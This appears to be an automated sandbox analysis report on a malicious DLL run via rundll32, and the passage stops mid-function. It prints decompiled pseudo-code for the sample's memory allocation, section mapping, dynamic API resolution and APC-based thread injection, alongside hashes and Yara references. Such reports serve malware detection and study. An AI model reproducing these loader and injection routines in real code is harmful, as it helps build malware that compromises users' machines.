Download Yara Rule

APIs

OpenMutexW.KERNEL32(001F0001,00000001,C:\Windows), ref: 6E19056E
GetWindowsDirectoryW.KERNEL32(C:\Windows,00000649), ref: 6E1905CD

Strings

C:\Windows, xrefs: 6E190561, 6E190566, 6E1905CC

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: DirectoryMutexOpenWindows
String ID: C:\Windows
API String ID: 3115804697-2661751657
Opcode ID: 777d2f3d7c0add68d8d11ea0db1e36f0d6c1db07b109f8241b3e327be5077e90
Instruction ID: 579d8ba27c4a60d35e754605837b006bd7c50cd9a6f89951894e7b7671c4bdea
Opcode Fuzzy Hash: 777d2f3d7c0add68d8d11ea0db1e36f0d6c1db07b109f8241b3e327be5077e90
Instruction Fuzzy Hash: 4D51D471904A688FDB148F59C6583A537B3F74A320F156029ED589F340E3B90BA9EBB4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A3490, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1A34E8
DName::DName.LIBVCRUNTIMED ref: 6E1A34F7

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

Strings

A, xrefs: 6E1A34A6

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Name::$Node::makeStatus
String ID: A
API String ID: 3739413223-3554254475
Opcode ID: cc205419bfa92c23ec6ea6be3c1222eb5c27b847dd855f306cd4a8062f0c41b8
Instruction ID: 1204f80260488a21b4bd70b4f991598af8e7b8f7a954230115db205612517f46
Opcode Fuzzy Hash: cc205419bfa92c23ec6ea6be3c1222eb5c27b847dd855f306cd4a8062f0c41b8
Instruction Fuzzy Hash: 43014B74905148FFCB02DFA8D85ABEC7BA5AB42704F148099EA485B391C771AEC1EBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E194020, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E19406E
___vcrt_getptd.LIBVCRUNTIMED ref: 6E194082

Strings

csm, xrefs: 6E194039

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: a79881c50edc9e5e37fc0e26bcb80cca223ba5c288d7f2d7cdab504985599886
Instruction ID: a08172d9946653a2261dd7c9c4201504c7d677aa8df50f58a5f8299e9a7cc53c
Opcode Fuzzy Hash: a79881c50edc9e5e37fc0e26bcb80cca223ba5c288d7f2d7cdab504985599886
Instruction Fuzzy Hash: 1D01E538A00208EFCB08CFA5C1908ADBBB6BF54205B6489A8C9595F315D771DF82FBD1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1752 Parent PID: 4312 rundll32.exeCOMMON

Executed Functions

Function 6E22C536, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000009EF,00003000,00000040,000009EF,-_^), ref: 6E22C5F0
VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040,6E22BFEF), ref: 6E22C627
VirtualAlloc.KERNEL32(00000000,00016DD9,00003000,00000040), ref: 6E22C687
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E22C6BD
VirtualProtect.KERNEL32(6E160000,00000000,00000004,6E22C515), ref: 6E22C7C2
VirtualProtect.KERNEL32(6E160000,00001000,00000004,6E22C515), ref: 6E22C7E9
VirtualProtect.KERNEL32(00000000,?,00000002,6E22C515), ref: 6E22C8B6
VirtualProtect.KERNEL32(00000000,?,00000002,6E22C515,?), ref: 6E22C90C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E22C928

Strings

-_^, xrefs: 6E22C5E4

Memory Dump Source

Source File: 00000003.00000002.592845075.000000006E22B000.00000040.00020000.sdmp, Offset: 6E22B000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID: -_^
API String ID: 2574235972-2116301257
Opcode ID: 5ccb745bd81504e9af754416eac276dfbf2b8732d61062dd7648f31a585e0766
Instruction ID: b44ab9a4aa17511f86eb7497d35ca5685a53d0f491fa52a9d5061dcb307d2a9d
Opcode Fuzzy Hash: 5ccb745bd81504e9af754416eac276dfbf2b8732d61062dd7648f31a585e0766
Instruction Fuzzy Hash: E7D18976920641DFDB108F54CC91B613BA7FF88B10B0A25A6ED0A9F39ED771E811CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1615F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1615F1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E161F14(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6e1615fa
0x6e161601
0x6e161602
0x6e161603
0x6e161604
0x6e161605
0x6e161616
0x6e16161a
0x6e16162e
0x6e161631
0x6e161634
0x6e16163b
0x6e16163e
0x6e161645
0x6e161648
0x6e16164b
0x6e16164e
0x6e161653
0x6e16168e
0x6e161655
0x6e161658
0x6e16165e
0x6e161663
0x6e161667
0x6e161685
0x6e161669
0x6e161670
0x6e16167e
0x6e16167e
0x6e161667
0x6e161696

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6E16164E

Part of subcall function 6E161F14: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E161663,00000002,00000000,?,?,00000000,?,?,6E161663,00000002), ref: 6E161F41

memset.NTDLL ref: 6E161670

Strings

@, xrefs: 6E16163E

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 39e720e2c94793e4bf624767ebfb882cd87e7a4b170212c2c62006b4db7c7316
Instruction ID: de4e3e2fbf216eef6e3dba26d18833ad096be60594be2b1766eab06d903ab530
Opcode Fuzzy Hash: 39e720e2c94793e4bf624767ebfb882cd87e7a4b170212c2c62006b4db7c7316
Instruction Fuzzy Hash: F7210BB5E00209AFDB01CFE9C8849DEFBB9EB48354F118869E515F3210D770AA589B64

Uniqueness

Uniqueness Score: -1.00%

Function 6E161F14, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E161F14(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e161f26
0x6e161f2c
0x6e161f3a
0x6e161f41
0x6e161f46
0x6e161f4c
0x00000000
0x6e161f4d
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E161663,00000002,00000000,?,?,00000000,?,?,6E161663,00000002), ref: 6E161F41

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 1703a0568238817057276ff07a54f239ffccbe45e9f23981f7354f3e86b17cf7
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: D7F01CB6A0420CBFEB119FA5CC85CDFBBBDEB44394B104979F256E1090D770AE5C9A60

Uniqueness

Uniqueness Score: -1.00%

Function 6E161352, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E161352(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E162130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e164144;
				_push(_t15 + 0x6e16505e);
				_push(_t15 + 0x6e165054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E16212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e164148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e161352
0x6e16135b
0x6e16135f
0x6e161365
0x6e16136a
0x6e16136f
0x6e161372
0x6e161375
0x6e16137a
0x6e16137b
0x6e16137e
0x6e161389
0x6e161390
0x6e161394
0x6e161396
0x6e161397
0x6e16139a
0x6e16139f
0x6e1613a9
0x6e1613ab
0x6e1613ab
0x6e1613bf
0x6e1613c5
0x6e1613c9
0x6e161419
0x6e1613cb
0x6e1613d4
0x6e1613ea
0x6e1613f2
0x6e161404
0x6e161408
0x00000000
0x00000000
0x6e1613f4
0x6e1613f7
0x6e1613fc
0x6e1613fe
0x6e1613fe
0x6e1613df
0x6e1613e1
0x6e16140a
0x6e16140b
0x6e16140b
0x6e1613d4
0x6e161421

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E16135F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E161375
_snwprintf.NTDLL ref: 6E16139A
CreateFileMappingW.KERNELBASE(000000FF,6E164148,00000004,00000000,?,?), ref: 6E1613BF
GetLastError.KERNEL32 ref: 6E1613D6
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1613EA
GetLastError.KERNEL32 ref: 6E161402
CloseHandle.KERNEL32(00000000), ref: 6E16140B
GetLastError.KERNEL32 ref: 6E161413

Strings

`RxtAxt, xrefs: 6E16135F

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: `RxtAxt
API String ID: 1724014008-1376811538
Opcode ID: 8d83fc20a07711724560874916922bda01ff70de000e93ee62c550fa877a2f7c
Instruction ID: efaaf002ef18e627430f84d0d49082e9fc89fd78a12df9071aef3d14f9305c5d
Opcode Fuzzy Hash: 8d83fc20a07711724560874916922bda01ff70de000e93ee62c550fa877a2f7c
Instruction Fuzzy Hash: BA21A4B2600108BFDB41DFE4CC88EEE7779EB95355F218035F619D7180D730999AAB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E161237, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E161237(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6E161CDD();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6E1610E8(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6E16179C(E6E161424,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6E161BE5(_t44,  &_a4) != 0) {
					 *0x6e164138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x6e164138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6E161CC8(_t48 + _t14);
				 *0x6e164138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E6E16133D(_t43);
				goto L11;
			}

0x6e16123e
0x6e161245
0x6e16124a
0x6e16133a
0x6e16133a
0x6e161251
0x6e161255
0x6e16125b
0x6e161269
0x6e16126a
0x6e16126d
0x6e161270
0x6e161279
0x6e16127c
0x6e161282
0x6e161285
0x6e16128c
0x6e161337
0x00000000
0x6e161337
0x6e161296
0x6e1612e7
0x6e1612e7
0x6e1612fd
0x6e161302
0x6e16132a
0x6e161304
0x6e161307
0x6e16130d
0x6e161312
0x6e161319
0x6e161319
0x6e161320
0x6e161320
0x6e16132d
0x6e161333
0x6e161335
0x6e161335
0x00000000
0x6e161333
0x6e1612a3
0x6e1612e1
0x00000000
0x6e1612e1
0x6e1612a5
0x6e1612a8
0x6e1612b1
0x6e1612b3
0x6e1612b7
0x6e1612d9
0x6e1612d9
0x00000000
0x6e1612d9
0x6e1612b9
0x6e1612be
0x6e1612c3
0x6e1612ca
0x00000000
0x00000000
0x6e1612cf
0x6e1612d2
0x00000000

APIs

Part of subcall function 6E161CDD: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E161243,747863F0), ref: 6E161CEC
Part of subcall function 6E161CDD: GetVersion.KERNEL32 ref: 6E161CFB
Part of subcall function 6E161CDD: GetCurrentProcessId.KERNEL32 ref: 6E161D17
Part of subcall function 6E161CDD: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E161D30

GetSystemTime.KERNEL32(?,00000000,747863F0), ref: 6E161255
SwitchToThread.KERNEL32 ref: 6E16125B

Part of subcall function 6E1610E8: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E16113E
Part of subcall function 6E1610E8: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E161204

Sleep.KERNELBASE(00000000,00000000), ref: 6E16127C
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1612B1
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1612CF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E161307
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E161319
CloseHandle.KERNEL32(00000000), ref: 6E161320
GetLastError.KERNEL32(?,00000000), ref: 6E161328
GetLastError.KERNEL32 ref: 6E161335

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: e29ca2563dc8e494a6819dbecc49dc6467b9291d7bba88f2262624c525be89af
Instruction ID: a9ba7c71c75ca9121859d07debd5fc0ba70ce45376afe29f88aaac8727c5acf8
Opcode Fuzzy Hash: e29ca2563dc8e494a6819dbecc49dc6467b9291d7bba88f2262624c525be89af
Instruction Fuzzy Hash: 0131D672E00615EBCF41DBE58C488AE77BCEF963207308515E909E3200E730C999FB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E161F56, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e164108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e16410c;
						if( *0x6e16410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e164118;
								if( *0x6e164118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e16410c);
						}
						HeapDestroy( *0x6e164110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e164108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e164110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e164130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E16179C(E6E16173D, E6E161C6E(_a12, 1, 0x6e164118, _t41));
							 *0x6e16410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

APIs

InterlockedIncrement.KERNEL32(6E164108), ref: 6E161F78
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E161F8D

Part of subcall function 6E16179C: CreateThread.KERNELBASE ref: 6E1617B3
Part of subcall function 6E16179C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1617C8
Part of subcall function 6E16179C: GetLastError.KERNEL32(00000000), ref: 6E1617D3
Part of subcall function 6E16179C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1617DD
Part of subcall function 6E16179C: CloseHandle.KERNEL32(00000000), ref: 6E1617E4
Part of subcall function 6E16179C: SetLastError.KERNEL32(00000000), ref: 6E1617ED

InterlockedDecrement.KERNEL32(6E164108), ref: 6E161FE0
SleepEx.KERNEL32(00000064,00000001), ref: 6E161FFA
CloseHandle.KERNEL32 ref: 6E162016
HeapDestroy.KERNEL32 ref: 6E162022

Strings

Txt, xrefs: 6E161F8D

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID: Txt
API String ID: 2110400756-4033135041
Opcode ID: 96ea96e041d88275710a71f2e44e79e7a92658588342dd1dea6eda60671a13b1
Instruction ID: 757576b2202a8c8e45d77de18350c36d26b40512f22f3d4e71c5aa765134f1b1
Opcode Fuzzy Hash: 96ea96e041d88275710a71f2e44e79e7a92658588342dd1dea6eda60671a13b1
Instruction Fuzzy Hash: 5821A171601606AFCF809FE9CC9896D3BB8F767761720C425E515D3140D73099AAFB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E16150D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E16150D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E161CC8(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e164144 + 0x6e165014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e164144 + 0x6e165151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E16133D(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e164144 + 0x6e165161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e164144 + 0x6e165174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e164144 + 0x6e165189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e164144 + 0x6e16519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E1615F1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

Part of subcall function 6E161CC8: HeapAlloc.KERNEL32(00000000,?,6E161C03,00000208,00000000,00000000,?,?,?,6E1612A1,?), ref: 6E161CD4

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1616D5,?,?,?,?,?,00000002,?,6E1614D0), ref: 6E161531
GetProcAddress.KERNEL32(00000000,?), ref: 6E161553
GetProcAddress.KERNEL32(00000000,?), ref: 6E161569
GetProcAddress.KERNEL32(00000000,?), ref: 6E16157F
GetProcAddress.KERNEL32(00000000,?), ref: 6E161595
GetProcAddress.KERNEL32(00000000,?), ref: 6E1615AB

Part of subcall function 6E1615F1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6E16164E
Part of subcall function 6E1615F1: memset.NTDLL ref: 6E161670

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: ff57bdc1bc394128ff6e2013ab38b4e01c5680fd33ec5be65f03bb027e7921a2
Instruction ID: de9d93d1bf96341504789c29cd8aff6dffc12f4db830d1bf712c74c1f4db5031
Opcode Fuzzy Hash: ff57bdc1bc394128ff6e2013ab38b4e01c5680fd33ec5be65f03bb027e7921a2
Instruction Fuzzy Hash: 6D2191B170060FAFDB51DFAAC850D6AB7FCEF563087514425E44AE7201EB30E909EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E16179C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E16179C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e164140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e1617b3
0x6e1617b9
0x6e1617bd
0x6e1617c8
0x6e1617d0
0x6e1617d9
0x6e1617dd
0x6e1617e4
0x6e1617eb
0x6e1617ed
0x6e1617f3
0x6e1617d0
0x6e1617f7

APIs

CreateThread.KERNELBASE ref: 6E1617B3
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1617C8
GetLastError.KERNEL32(00000000), ref: 6E1617D3
TerminateThread.KERNEL32(00000000,00000000), ref: 6E1617DD
CloseHandle.KERNEL32(00000000), ref: 6E1617E4
SetLastError.KERNEL32(00000000), ref: 6E1617ED

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 056382ec3ef532fd9e229aa8f4acd840e3bf329a320b0bf23bde6ae48c04dd68
Instruction ID: e7522d4deaa2fe506122d22f882eee9216578734f98308f544be649f5cc832bc
Opcode Fuzzy Hash: 056382ec3ef532fd9e229aa8f4acd840e3bf329a320b0bf23bde6ae48c04dd68
Instruction Fuzzy Hash: B3F08C32605A21FFDFA25BA08C4CFBFBF68FB9A712F008404F61595140C731881ABBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1610E8, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E1610E8(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6e164130;
				_t50 = E6E161B4C(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
